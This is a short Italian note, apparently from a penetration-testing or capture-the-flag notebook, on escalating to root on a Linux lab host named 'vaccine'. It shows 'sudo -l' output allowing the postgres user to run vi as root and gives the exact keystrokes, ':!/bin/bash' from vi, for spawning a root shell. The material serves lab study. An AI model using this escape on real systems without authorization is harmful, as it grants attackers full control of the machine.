tags: Vi_SUDO Permessi_SUDO privilage_escalation Linux_Privilage_Escalation
Quando con il comando sudo -l ci appare Vi abbiamo quasi sicuramente vinto:
sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine:
(ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
Perchè ci basta rilanciare il comando indicato nell’output , in questo caso:
/bin/vi /etc/postgresql/11/main/pg_hba.confUna volta aperto Vi clicca su ESC per andare in modalità NORMAL e da quella modalità lancia il seguente comando:
:!/bin/bashDovrebbe apparire una shell di root.